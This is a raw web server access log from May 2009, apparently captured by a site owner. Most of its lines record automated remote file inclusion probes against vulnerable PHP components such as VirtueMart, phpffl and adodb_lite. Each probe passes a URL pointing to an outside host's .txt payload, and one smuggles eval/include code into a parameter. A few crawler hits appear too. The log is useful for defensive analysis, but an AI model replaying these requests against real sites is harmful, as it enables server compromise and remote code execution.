213.203.223.93 - - [30/May/2009:01:04:19 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:01:04:27 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.92.97.90 - - [30/May/2009:01:04:41 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.92.97.90 - - [30/May/2009:01:04:41 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:04:45 -0500] "GET /logs/access_log.1242432000//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:04:45 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:04:45 -0500] "GET //ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:04:45 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.92.97.90 - - [30/May/2009:01:04:47 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
213.203.223.93 - - [30/May/2009:01:05:37 -0500] "GET /logs/access_log.1241049600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
94.23.200.54 - - [30/May/2009:01:05:54 -0500] "GET /logs/access_log.1242518400///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:05:54 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:05:55 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 191355 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:06:01 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:06:01 -0500] "GET /logs/access_log.1242518400///?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:06:03 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 191355 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:06:07 -0500] "GET /logs/access_log.1242432000//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:06:07 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:06:07 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:06:07 -0500] "GET //ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:06:11 -0500] "GET /logs/access_log.1242259200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [30/May/2009:01:06:11 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [30/May/2009:01:06:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
72.18.148.82 - - [30/May/2009:01:06:58 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:06:59 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:06:59 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:07:00 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:08:21 -0500] "GET /index2.php?p=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:08:21 -0500] "GET /logs/index2.php?p=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:08:21 -0500] "GET /logs/access_log.1238630400/index2.php?p=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:08:23 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [30/May/2009:01:08:24 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
220.181.7.97 - - [30/May/2009:01:10:04 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.18.148.82 - - [30/May/2009:01:11:31 -0500] "GET /logs/access_log.1240012800/index2.php?p=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:14:18 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:14:18 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:14:18 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:15:27 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:15:27 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:15:27 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:15:30 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:15:33 -0500] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:15:33 -0500] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:15:33 -0500] "GET /logs/access_log.1242432000/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:17:23 -0500] "GET /////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:17:23 -0500] "GET /logs/////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:17:23 -0500] "GET /logs/access_log.1237680000/////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.203.223.93 - - [30/May/2009:01:18:03 -0500] "GET /logs/access_log.1240876800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:01:18:07 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:01:18:07 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
80.237.146.58 - - [30/May/2009:01:18:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:01:18:12 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
213.203.223.93 - - [30/May/2009:01:18:50 -0500] "GET /logs/access_log.1239667200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
203.151.233.72 - - [30/May/2009:01:18:55 -0500] "GET /logs/access_log.1234051200/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:18:55 -0500] "GET /logs/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:18:55 -0500] "GET /main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:18:55 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:19:45 -0500] "GET /logs/////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:19:46 -0500] "GET /logs/access_log.1237680000/////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:19:46 -0500] "GET /////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:19:49 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:19:49 -0500] "GET /logs/access_log.1237593600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:19:49 -0500] "GET /logs/access_log.1241654400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:19:49 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:20:03 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:20:03 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:20:13 -0500] "GET /logs/access_log.1236988800//include/mail.inc.php?skin_board_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:01:20:25 -0500] "GET /logs/access_log.1228608000//include/mail.inc.php?skin_board_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:21:16 -0500] "GET /logs/access_log.1240963200/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:21:40 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [30/May/2009:01:21:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [30/May/2009:01:21:41 -0500] "GET /logs/access_log.1240876800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.55.106.164 - - [30/May/2009:01:22:23 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.237.146.58 - - [30/May/2009:01:22:29 -0500] "GET /logs/access_log.1239667200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.107.3.73 - - [30/May/2009:01:24:14 -0500] "GET /include/lib.inc.php?site_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
201.232.54.48 - - [30/May/2009:01:29:35 -0500] "GET /editsite.php?returnpath=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:01:29:35 -0500] "GET /logs/access_log.1240012800/editsite.php?returnpath=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:01:29:35 -0500] "GET /logs/editsite.php?returnpath=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:01:29:42 -0500] "GET /logs/access_log.1242432000/editsite.php?returnpath=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:33:31 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:33:31 -0500] "GET /logs/access_log.1237593600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:33:31 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.151.233.72 - - [30/May/2009:01:33:37 -0500] "GET /logs/access_log.1241654400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.243.71 - - [30/May/2009:01:36:02 -0500] "GET /logs/access_log.1239062400/////include/print_category.php?setup[use_category]=1&dir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:36:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:01:36:42 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
213.203.223.93 - - [30/May/2009:01:38:27 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:01:38:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [30/May/2009:01:38:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.17.162.28 - - [30/May/2009:01:39:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:08 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:11 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:11 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:11 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:11 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:14 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:01:39:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:15 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:16 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:19 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:21 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:21 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:22 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:01:39:24 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:01:39:24 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:24 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:39:25 -0500] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:01:39:25 -0500] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
85.17.162.28 - - [30/May/2009:01:39:25 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:26 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:27 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:31 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:01:39:36 -0500] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:01:39:37 -0500] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
85.17.162.28 - - [30/May/2009:01:39:38 -0500] "GET //config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:38 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:39 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:39:41 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
